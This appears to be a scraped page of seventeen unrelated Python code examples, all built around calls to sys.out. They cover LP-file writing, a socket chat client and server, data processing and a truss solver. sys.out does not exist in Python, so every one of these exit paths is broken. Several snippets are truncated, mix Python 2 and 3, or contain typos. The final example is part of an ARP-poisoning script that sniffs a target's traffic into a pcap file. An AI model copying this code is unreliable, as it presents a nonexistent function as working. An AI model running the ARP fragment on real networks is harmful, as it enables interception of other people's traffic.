Ejemplo n.º 1
0
    def sort_write_lp(self, ph, ObjObject, ConstraintMap, StageToConstraintMap,
                      remaining_lpfile_rows):

        try:
            print("\nWrite the LP file for dd in sorted_LPfile.lp\n")
            lp = open("sorted_LPfile.lp", "w")
        except IOError:
            print("IO Error so that sorted_LPfile.lp cannot be created.")
            sys.out(1)

        # keep track of input file names
        self.input_file_name_list.append('sorted_LPfile.lp')

        # for the matrix.sc file we need to know which constraint is
        # in which row:
        MatrixEntries_ConstrToRow_Map = {}

        lp.write(ObjObject[0] + "\n " + ObjObject[1] + ":\n")
        self.print_coeff_var_from_map(ObjObject[2], lp)

        # assume blank line before and after constraint indicator
        lp.write("\ns.t.\n")

        FirstStage = StageToConstraintMap['FirstStage']
        ConstrNames = list(ConstraintMap.keys())
        ConstrNames.sort()
        RememberSecStageConstr = []
        # so that we know in which rows the constraints with
        # stochastic data are (first row has index 0)
        count_rows = -1

        for name in ConstrNames:
            # check if constraint is in first stage
            if name in FirstStage:
                lp.write("\n" + name + ":\n")
                count_rows += 1
                MatrixEntries_ConstrToRow_Map[name] = count_rows
                self.print_coeff_var_from_map(ConstraintMap[name][0], lp)
                lp.write(ConstraintMap[name][1] + " " +
                         ConstraintMap[name][2] + "\n")
            else:
                RememberSecStageConstr.append(name)

        MatrixEntries_ConstrToRow_Map = \
            self._sort_print_second_stage_constr(ph,
                                                 RememberSecStageConstr,
                                                 lp,
                                                 ConstraintMap,
                                                 count_rows,
                                                 MatrixEntries_ConstrToRow_Map)

        # print the remaining rows of the lp file
        for row in range(len(remaining_lpfile_rows)):
            lp.write("\n")
            for i in range(len(remaining_lpfile_rows[row])):
                lp.write(remaining_lpfile_rows[row][i] + " ")

        lp.close()
        #print MatrixEntries_ConstrToRow_Map
        return MatrixEntries_ConstrToRow_Map
Ejemplo n.º 2
0
 def save_data(self, data):
     try:
         with open(self.FILE, "wb") as f:
             pickle.dump(data, f)
     except:
         print("Se ha producido un error al exportar.")
         sys.out(0)
Ejemplo n.º 3
0
    def sort_write_lp(self, ph, ObjObject, ConstraintMap, StageToConstraintMap, remaining_lpfile_rows):

        try:
            print("\nWrite the LP file for dd in sorted_LPfile.lp\n")
            lp = open("sorted_LPfile.lp", "w")
        except IOError:
            print("IO Error so that sorted_LPfile.lp cannot be created.")
            sys.out(1)

        # keep track of input file names
        self.input_file_name_list.append('sorted_LPfile.lp')

        # for the matrix.sc file we need to know which constraint is
        # in which row:
        MatrixEntries_ConstrToRow_Map = {}

        lp.write(ObjObject[0]+"\n "+ObjObject[1]+":\n")
        self.print_coeff_var_from_map(ObjObject[2], lp)

        # assume blank line before and after constraint indicator
        lp.write("\ns.t.\n")

        FirstStage = StageToConstraintMap['FirstStage']
        ConstrNames = list(ConstraintMap.keys())
        ConstrNames.sort()
        RememberSecStageConstr = []
        # so that we know in which rows the constraints with
        # stochastic data are (first row has index 0)
        count_rows = -1

        for name in ConstrNames:
            # check if constraint is in first stage
            if name in FirstStage:
                lp.write("\n"+name+":\n")
                count_rows += 1
                MatrixEntries_ConstrToRow_Map[name] = count_rows
                self.print_coeff_var_from_map(ConstraintMap[name][0], lp)
                lp.write(ConstraintMap[name][1]+" "+ConstraintMap[name][2]+"\n")
            else:
                RememberSecStageConstr.append(name)

        MatrixEntries_ConstrToRow_Map = \
            self._sort_print_second_stage_constr(ph,
                                                 RememberSecStageConstr,
                                                 lp,
                                                 ConstraintMap,
                                                 count_rows,
                                                 MatrixEntries_ConstrToRow_Map)

        # print the remaining rows of the lp file
        for row in range(len(remaining_lpfile_rows)):
            lp.write("\n")
            for i in range(len(remaining_lpfile_rows[row])):
                lp.write(remaining_lpfile_rows[row][i]+" ")

        lp.close()
        #print MatrixEntries_ConstrToRow_Map
        return MatrixEntries_ConstrToRow_Map
def receive_message():
	while True:
		incoming_message=client.recv(4096)
		if not incoming_message: 
			message_list.insert(END, ' ')	
			message_list.insert(END, 'DISCONNECTED FROM SERVER')
			message_list.insert(END, ' ')
			sys.out()
		else:
			incoming_message=incoming_message.decode()
			incoming_message='<'+host+'('+host_ip+')'+'> : '+incoming_message
			message_list.insert(END, incoming_message)
Ejemplo n.º 5
0
def wait():
	global button
	global money
	
	global q
	
	q=-1
	a=input('Insert your money:')
	money+=a
	print "You have %dwon" % money
	if a==-1:
		sys.out()
	if money>=0:
		select()
Ejemplo n.º 6
0
	def compute_test_error(self,restore_directory):
		# Build model and initialize variables
		self.build_model()
		self.initialize_variables()
		# Check if restore directory actually exists
		if not os.path.exists(restore_directory):
			sys.out("Restore directory not valid")
		restoreFile = restore_directory + "/ConvNet.ckpt"
		# Start TensorFlow session
		with tf.Session() as sess:
			# TensorFlow initialization
			sess.run(self.init)
			# Restore the network
			self.system_saver.restore(sess, restoreFile)
			# Read lists describing test and training set
			self.DataSet.read_training_test_set_list()
			self.DataSet.read_last_batch_image()
			# Compute Roc score for the whole test set
			RealTargets = []
			PredictedTargets = []
			step = 1
			NTestData = self.DataSet.NtestData
			while step * self.batch_size < NTestData:
				# Load new test batch
				batch_x, batch_y = self.DataSet.next_test_batch()
				# Predict labels
				Y_pred = sess.run(self.predicted_classes, feed_dict={self.x: batch_x,\
										self.keep_prob: 1.0})
				PredictedTargets = PredictedTargets + list(Y_pred)
				# Format true targets
				for target in batch_y:
					if target[0] == 1.0:
						RealTargets.append(0)
					elif target[1] == 1.0:
						RealTargets.append(1)
				step = step + 1
		# Compute scores: area under the ROC and total accuracy
		ROCscore = roc_auc_score(RealTargets, PredictedTargets)
		accuracy = float(np.sum(map(int, np.equal(RealTargets, \
				PredictedTargets)))) / float(len(RealTargets))
		# Print results on std out
		print "Scores obtained on the whole test dataset"
		print "Accuracy = ", accuracy
		print "Area under the ROC = ", ROCscore
Ejemplo n.º 7
0
def receive_message():
	global conn
	#obtaining client host name and port
	conn, addr = server.accept()
	info_5=str(addr) + ' has joined the server.'
	message_list.insert(END,info_5)
	message_list.insert(END,' ')
	message_list.insert(END,'MESSAGE FACILITY ACTIVE')
	message_list.insert(END,' ')
	while True:
		#receiving messages from the client
		incoming_message=conn.recv(4096)
		if not incoming_message:
			message_list.insert(END,' ')
			message_list.insert(END,'Client Disconnected')
			message_list.insert(END,' ')
			sys.out()
		else:
			incoming_message=incoming_message.decode()
			incoming_message='<'+str(addr)+'>' + ' : ' + incoming_message
			message_list.insert(END,incoming_message) 
Ejemplo n.º 8
0
def main(opts):
    img_path = Path(opts.image_path)
    if not img_path.exists():
        print('ERROR: image file does not exist or cannot be accessed')
        sys.out(-1)

    embed_path = Path(opts.embed_path)
    if not embed_path.exists():
        print('ERROR: embeddings file does not exist or cannot be accessed')
        sys.out(-1)

    embeddings = np.load(embed_path, allow_pickle=True).item()
    if not img_path.name in embeddings:
        print('ERROR: could not find the image filename in the embeddings npy')
        sys.out(0)

    img = Image.open(img_path)
    colors = sns.color_palette('Set2')
    fnt = ImageFont.truetype('Pillow/Tests/fonts/FreeMono.ttf', 30)

    for idx, face in enumerate(embeddings[img_path.name]['faces']):
        canvas = ImageDraw.Draw(img)
        color = tuple([int(255 * c) for c in colors[idx]])
        canvas.rectangle(face['bbox'], fill=None, outline=color)
        canvas.text((face['bbox'][0], face['bbox'][1]),
                    str(idx),
                    font=fnt,
                    fill=(color[0], color[1], color[2], 255))

    img.show()
Ejemplo n.º 9
0
def extractData():
    fileNames = glob.glob('Taxi\\*.csv')
    if len(fileNames) == 0:
        print('Data does not exist for processing. Please download data frist')
        sys.out(0)

    for fileName in fileNames:
        print("Reading file: {0}".format(fileName))
        extracted_month = fileName.replace('Taxi\\yellow_tripdata_',
                                           '').replace('.csv', '')
        #Read the csv for the month
        df = pd.read_csv(fileName)
        #Extract and add the travel date in the dataframe
        print("Adding travel date in the dataframe")
        df['travel_date'] = df['tpep_pickup_datetime'].apply(
            lambda x: datetime.strptime(x, '%Y-%m-%d %H:%M:%S').date())
        print("Creating file structure")
        for i in df.VendorID.unique():
            print("Filtering Vendor: {0}".format(i))
            dfi = df[df['VendorID'] == i]
            #print(dfi.head())
            for dt in dfi.travel_date.unique():
                print("Filtering Date: {0}".format(dt))
                dfidt = dfi[dfi['travel_date'] == dt]
                #Create folder
                data_file_folder = 'Data/' + str(
                    i) + '/' + extracted_month + '/original/'
                if not os.path.exists(data_file_folder):
                    os.makedirs(data_file_folder)
                #file format Data/VendorId/Month/original/Day.csv
                data_file_name = data_file_folder + str(dt) + '.csv'
                print("CSV created: {0}".format(data_file_name))
                dfidt.to_csv(data_file_name,
                             sep=',',
                             encoding='utf-8',
                             index=False)
    print('Data extraction complete')
    # import tarfile
    # import re
    from pyspark.sql.window import Window
    import datetime as dt
    # import os
    import sys
    from pyspark import SparkContext
    from pyspark.sql import SparkSession
    from pyspark.conf import SparkConf
    import numpy as np
    from recommendation_generation_engine_s import *
except Exception as e:
    message = 'error importing libraries in file running daily'
    print message
    print e
    sys.out(1)

##########################################################################
# spark

spark = get_spark_session_object()
print "importing and initialisation finished"


##########################################################################

def main():
    # load files
    # bxu updates
    # commented by bxu
    # dh_activity, _, relevant_urlid = file_loader(
Ejemplo n.º 11
0
except:
    print("\t***\"" + DTA + "\" was not found")
    sys.exit("**** End of Program ****")
#endTrydat
Tuples = FN.readlines()
n = len(Tuples)
print("Tuples:     " + str(n))
LineLen = len(Tuples[0])
Atribs = NumCols(Tuples[0], LineLen)
m = Atribs
print("Attributes: " + str(m))
print("INDEPENDENT VARIABLES: " + str(m - 1))
IV = m - 1
if (IV > MaximumNumberOfIndependentVariables):
    print("Exceeded number of maximum allowed independent variables")
    sys.out("***\t\tPROGRAM WILL NOW END\t\t***")
#endif
print("\tDEPENDENT VARIABLE IS IN COLUMN " + str(m))
print()
dummy = input("\"ENTER\" to continue\n")
FN = open(DTA, "r")  # REWIND
xy = list(range(0, n + 1))
for i in range(0, n + 1):
    xy[i] = list(range(0, m + 1))
#
#       PON LOS DATOS EN xy[i][j] EN PUNTO FLOTANTE
#
for i in range(0, n):  # n tuples  (i=0,1,...,n-1)
    for j in range(0, m):  # m columns (j=0,1,...,m-1)
        L = Tuples[i]
        Num = getNum(L, j)  #"Num" is Floating point
Ejemplo n.º 12
0

def get_systems(domain=""):
    nextfeed = etree.fromstring(
        requests.get(FEEDS.format(domain=domain)).text.encode('utf-8'))
    cities = nextfeed.xpath("/markers/country/city")
    new_cities = []
    for c in cities:
        if 'city_uid' in c.attrib:
            uid = int(c.attrib['city_uid'])
        elif 'uid' in c.attrib:
            uid = int(c.attrib['uid'])
        else:
            raise Exception("This city has no uid")
        found = next(
            (i for i in sysdef['instances'] if i['city_uid'] == uid), None)
        if not found:
            new_cities.append(c)
    if args.verbose:
        sys.stderr.write(">> Found %d new cities in %s\n" % (
            len(new_cities), domain))
    systems = map(lambda c: Nextfeed(c, domain), new_cities)
    return systems

for domain in args.domain.split(','):
    systems = get_systems(domain)
    sysdef['instances'] += map(lambda sys: sys.out(), systems)

filewriter.write(json.dumps(sysdef, indent=4, separators=(',', ':')))
filewriter.write("\n")
Ejemplo n.º 13
0
    crawledVouchers = set(re.compile(r'([A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4})').findall(voucherSource))
    total_numberof_vouchers = len(crawledVouchers)

print('Anzahl gefundener Gutscheine: ' + str(len(crawledVouchers)))
printSeparator()

index = 0
for voucher in crawledVouchers:
    index += 1
    print('Gutschein %d : %s' % (index, voucher))
printSeparator()

logged_in = loginAccount(br, settings)
if not logged_in:
    print('Login-Fehler')
    sys.out()

printSeparator()
user_input_article_url = None
url_article_30euro = 'https://www.aral-supercard.de/shop/produkt/aral-supercard-einkaufen-tanken-30-2123'
url_article_40eurojp = 'https://www.aral-supercard.de/shop/produkt/jp-performance-einkaufen-tanken-individueller-wert-sondermotiv-motor-show-2124'
while True:
    print(
        'Achtung! Alle Gutscheine werden auf deine bevorzugte Adresse bestellt! Pruefe deine Adresse bevor du die Einloesung startest!')
    print('Waehle, aus welcher Aktion deine Gutscheine kommen:')
    print('1 = 30+5Euro --> Aktionsurl: %s' % url_article_30euro)
    print('2 = 40+6Euro_JP --> Aktionsurl: %s' % url_article_40eurojp)
    print('3 = Andere Aktion / Link zum Aktionsartikel selbst eingeben')
    user_input = userInputDefinedLengthNumber(1)
    if user_input < 0 or user_input > 3:
        # Bad user input
Ejemplo n.º 14
0
                        default="posfreq_results",
                        type=str,
                        help="directory where results will be saved")
    parser.add_argument(
        "--english_freq_fn",
        default=0.01,
        type=float,
        help=
        "if do_freq is used and the language is English, you need to provide the path to the Google Ngrams frequency file"
    )

    args = parser.parse_args()

    if args.language == "en" and not args.english_freq_fn:
        sys.out(
            "Provide a path to a file containing Google Ngrams frequencies in English with --english_freq_fn"
        )

    if not os.path.exists(args.out_dir):
        os.makedirs(args.out_dir)

    # Load data for that language
    data, word_dict = load_data(language)
    freq_counts = load_freq_counts(language, args.english_freq_fn)

    ######### 1. DATASET ANALYSIS
    # 1.1 CHECK THE DISTRIBUTION OF POS OVER BANDS
    pos_by_word, pos_by_band, pos_by_band_props = posdist_overbands(word_dict)
    # 1.2 CHECK THE DISTRIBUTION OF FREQ OVER BANDS
    freqband_by_word_4, freq_by_band_4, freq_by_band_4_props = freqdist_overbands(
        word_dict, freq_counts)
Ejemplo n.º 15
0
def map_activities(city,
                   categories=None,
                   time_intervals=None,
                   color_patterns=None,
                   max_intensity=1,
                   geojson=False,
                   geojson_options={},
                   verbose=False):
    """
    It creates a gmaps object which is going to be used to plot all the
    activity locations on a map.

    Parameters
    ----------
    city : string
        Name of the city whose activities we want to map.
    categories : dictionary of categories
        This dictionary has category ids as keys and category labels as items.
    time_intervals : either a datetime object or a list of datetime objects
        Each datetime object describes either both limits of a time interval or
        just one. In this last case, the time interval is calculated by using
        the current time as the other limit of the timer interval.
    color_patterns : either a string or a list of strings
        A string that defines which color pattern will be used in the plot. If
        a color pattern is defined for each category, they will be colored
        according to this list. More information about these patterns in the
        constants.py file.
    max_intensity : float
        A value that sets the maximum intensity for the heat map.
    geojson : boolean
        If True it uses a geojson file of city to map an additional population
        density layer
    geojson_options : dict
        Dictionary containing geojson options like
            colorscheme = 'Greys','viridis','inferno','plasma'
            invert = True or False for inverting the colorscheme
            opacity = int in the range of [0,1]
    verbose : boolean
        If true, it will display the numeric results of the total number of
        events that were found in each district.

    Returns
    -------
    my_map : gmaps object
        This object will be used to plot the map and all activities locations
        in a Jupyter Notebook.
    """
    my_map = gmaps.figure()

    # If geojson==True use an additional layer for the population density
    if geojson:
        colorscheme = geojson_options.get('colorscheme')
        opacity = geojson_options.get('opacity')
        invert = geojson_options.get('invert', False)
        districts_layer = load_districts_layer(city,
                                               colorscheme=colorscheme,
                                               opacity=opacity,
                                               invert=invert,
                                               verbose=verbose)

        my_map.add_layer(districts_layer)

    # Define initial variables, if needed
    if categories is None:
        categories = local_categories

    if max_intensity < 0:
        print("Parameter error: max_intensity must be a positive float.")
        sys.out(0)

    parsed_color_patterns = color_patterns_parser(color_patterns)

    # Apply a different color pattern for every layer by using a counter
    counter = 0

    # Choose an iterator depending on the filter chosen in the input parameters
    iterator = categories.items()
    iterator_type = "category"

    if time_intervals is not None:
        time_intervals = datetime_parser(time_intervals)
        iterator = enumerate(time_intervals)
        iterator_type = "time interval"

    for index, value in iterator:
        if iterator_type == "category":
            events_data, num_activities = read_custom_csv(
                './csv/{}.csv'.format(city), [
                    index,
                ])
            # Filter those events with wrong or unknown locations
            locations = locations_parser(events_data)

        elif iterator_type == "time interval":
            events_data, num_activities = read_custom_csv(
                './csv/{}.csv'.format(city), [i for i in categories])
            # Filter those events with wrong or unknown locations
            locations = locations_parser(events_data, value)

        if (len(locations) == 0):
            print("No local activities were found in " +
                  "{} matching {}: {}".format(city, iterator_type, value))
            continue

        layer = gmaps.heatmap_layer(locations)

        layer.gradient = parsed_color_patterns[counter]

        layer.max_intensity = max_intensity
        layer.point_radius = co.POINT_RADIUS
        my_map.add_layer(layer)

        counter = cyclic_iteration(counter, len(parsed_color_patterns) - 1)

    return my_map
Ejemplo n.º 16
0
    def run(self):
        lamda = 0.
        lamda0 = 0.
        dlamda = self.dlamda
        step = 0
        DeltaL = 0.
        DeltaL0 = 0.
        current_iteration = 0
        dLamdaPredict = 0.0
        #################################
        ## FIRST STEP : NEWTON-RAPHSON ##
        #################################
        step += 1
        lamda = lamda0 + dlamda
        Delta_u = np.zeros((2 * len(self.truss.nodes), 1))

        print '\n---NormalPlaneArcLengthAlgorithm :: Newton Raphson - Load level, lambda =', lamda, ' ---'

        #Apply loads:
        self.truss.applyNodalLoads(lamda)
        #Compute tangent stiffness matrix:
        Kt = self.truss.buildKt(self.computeTangentMethod)
        #Get the out of balance forces:
        g = self.truss.getOOBF()
        #Solve the linear system:
        du = np.linalg.solve(Kt, -g)
        #Get the global loads vector:
        qef = self.truss.get_qef()
        #Update deltaU:
        Delta_u += du
        #Update positions:
        self.truss.incrementPositions(Delta_u)
        #Compute the error:
        error = self.computeError(g, lamda)
        current_iteration = 0
        #Loop of the Newton-Raphson algorithm:
        while error > self.toll and current_iteration < self.nItMax:
            #Get the tangent stiffness matrix:
            Kt = self.truss.buildKt(self.computeTangentMethod)
            #Get the out of balance forces:
            g = self.truss.getOOBF()
            #Solve the linear system:
            du = np.linalg.solve(Kt, -g)
            #Update du:
            Delta_u += du
            #Update positions:
            self.truss.incrementPositions(Delta_u)
            #Compute the error:
            error = self.computeError(g, lamda)
            current_iteration += 1
        if current_iteration > self.nItMax:
            print "NormalPlaneArcLengthAlgorithm :: N.-R. didn't converge."
            sys.out()
        #Compute deltaL_0 and deltaL:
        DeltaL0 = math.sqrt(
            np.transpose(Delta_u).dot(Delta_u) +
            self.psi**2 * lamda**2 * np.transpose(qef).dot(qef)
        )  # !!!!!!!!!!!!!! A refaire !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
        DeltaL = DeltaL0
        lamda0 = lamda
        #Update the truss:
        self.truss.update()
        self.archive(lamda, current_iteration)
        self.display(step, lamda)

        #####################
        ## PREDICTOR PHASE ##
        #####################
        while lamda < self.lamdaMax and not self.stopit:
            print "-- NormalPlaneArcLengthAlgorithm:: The predictor at step ", step, "     \r",
            step += 1
            #Apply loads to the truss:
            self.truss.applyNodalLoads(lamda)

            current_iteration = 0
            Delta_u = np.zeros((2 * len(self.truss.nodes), 1))
            #Get the tangent stiffness matrix:
            Kt = self.truss.buildKt(self.computeTangentMethod)
            #Compute the out of balance forces:
            g = self.truss.getOOBF()
            #Compute the global loads vector:
            qef = self.truss.get_qef()
            #Try to invert the tangent stiffness matrix:
            try:
                Kt_inv = np.linalg.inv(Kt)
            except numpy.linalg.LinAlgError:
                print "Kt is not invertible"
                print(Kt)
                sys.exit()
            else:
                deltaP = -Kt_inv.dot(g)
                deltaPt = Kt_inv.dot(qef)

                Ct1 = np.transpose(deltaP).dot(deltaP) * np.transpose(
                    deltaPt).dot(deltaPt) + (
                        DeltaL**2 - np.transpose(deltaP).dot(deltaP)) * (
                            np.transpose(deltaPt).dot(deltaPt) +
                            self.psi**2 * np.transpose(qef).dot(qef))
                if Ct1 < 0:
                    print "Ct1 is negative. Can't take its square root."
                    sys.exit()
                else:
                    Ct1 = math.sqrt(Ct1)
                #Verify that the matrix is positive definite:
                if np.all(np.linalg.eigvals(Kt) > 0):
                    dlamda = (-np.transpose(deltaP).dot(deltaPt) +
                              Ct1) / (np.transpose(deltaPt).dot(deltaPt) +
                                      self.psi**2 * np.transpose(qef).dot(qef))
                else:
                    dlamda = (-np.transpose(deltaP).dot(deltaPt) -
                              Ct1) / (np.transpose(deltaPt).dot(deltaPt) +
                                      self.psi**2 * np.transpose(qef).dot(qef))
                dLamdaPredict = dlamda
                du = deltaP + dlamda * deltaPt
                DuPredict = du
                Delta_u += du
                lamda = lamda0 + dlamda
                #Update the positions:
                self.truss.incrementPositions(Delta_u)
                #Compute the error:
                error = self.computeError(g, Kt)

                #####################
                ## CORRECTOR PHASE ##
                #####################
                while error > self.toll and current_iteration < self.nItMax:
                    #print "lamda = ", lamda
                    #Apply loads:
                    self.truss.applyNodalLoads(lamda)
                    #Build Kt:
                    Kt = self.truss.buildKt(self.computeTangentMethod)
                    #Get the out of balance forces:
                    g0 = self.truss.getOOBF()
                    #Get the global loads vector:
                    qef = self.truss.get_qef()
                    #Try to invert Kt:
                    try:
                        Kt_inv = np.linalg.inv(Kt)
                    except numpy.linalg.LinAlgError:
                        print "Kt is not invertible"
                        print(Kt)
                        sys.exit()
                    else:
                        deltaP = -Kt_inv.dot(g0)
                        deltaPt = Kt_inv.dot(qef)
                        #Solve equation (18) by first finding both coefficients:
                        a1 = dLamdaPredict * self.psi**2 * np.transpose(
                            qef).dot(qef)
                        a1 = a1 + np.transpose(deltaPt).dot(DuPredict)
                        a2 = np.transpose(DuPredict).dot(deltaP)

                        lamda1 = -a2 / a1
                        dlamda += lamda1

                        du = deltaP + lamda1 * deltaPt
                        #Update:
                        Delta_u += du
                        lamda = lamda0 + dlamda
                        self.truss.incrementPositions(Delta_u)
                        error = self.computeError(g0, lamda)
                        current_iteration += 1

                if current_iteration != 0:
                    DeltaL = DeltaL0 * math.sqrt(
                        float(self.Id) / current_iteration)

                else:
                    print "Error : should not end up here !"
                self.truss.update()
                self.archive(lamda[0, 0], current_iteration)
                self.display(step, lamda)
                lamda0 = lamda

        print ""
        return 1
Ejemplo n.º 17
-1
print "[*] Setting up %s" % interface

gateway_mac = get_mac(gateway_ip)

if gateway_mac is None:
    print "[!!!] Failed to get gateway MAC. Exiting"
    sys.exit(1)
else:
    print "[*] Gateway %s is at %s" % (gateway_ip, gateway_mac)

target_mac = get_mac(target_ip)

if target_mac is None:
    print "[!!!] Failed to get target MAC. Exiting"
    sys.out(1)
else:
    print "[*] Target %s is at %s" % (target_ip, target_mac)

# start poison thread
poison_thread = threading.Thread(target = posion_target, args=(gateway_ip, gateway_mac, target_ip, target_mac))
poison_thread.start()

try:
    print "[*] Starting sniffer for %d packets" % packet_count

    bfp_buffer = "ip host %s" % target_ip
    packets = sniff(count = packet_count, filter = bpf_buffer, iface = interface)

    # write out the captured packets
    wrpcap('arper.pcap', packets)